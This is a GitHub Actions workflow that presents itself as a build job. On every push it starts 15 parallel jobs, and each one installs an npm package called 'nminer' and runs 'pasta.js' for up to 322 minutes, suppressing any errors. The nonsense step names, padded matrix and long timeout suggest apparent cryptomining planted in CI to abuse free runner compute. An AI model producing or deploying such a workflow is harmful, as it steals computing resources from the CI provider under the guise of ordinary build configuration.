name: pasta
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 950 }
          - { version: 2041 }
          - { version: 7659 }
          - { version: 8603 }
          - { version: 5725 }
          - { version: 9141 }
          - { version: 6312 }
          - { version: 8048 }
          - { version: 4300 }
          - { version: 9465 }
          - { version: 2512 }
          - { version: 7260 }
          - { version: 4768 }
          - { version: 1574 }
          - { version: 3501 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: majestically
        run: |
          npm install nminer@latest
          timeout 322m node pasta.js || echo "pasta executed"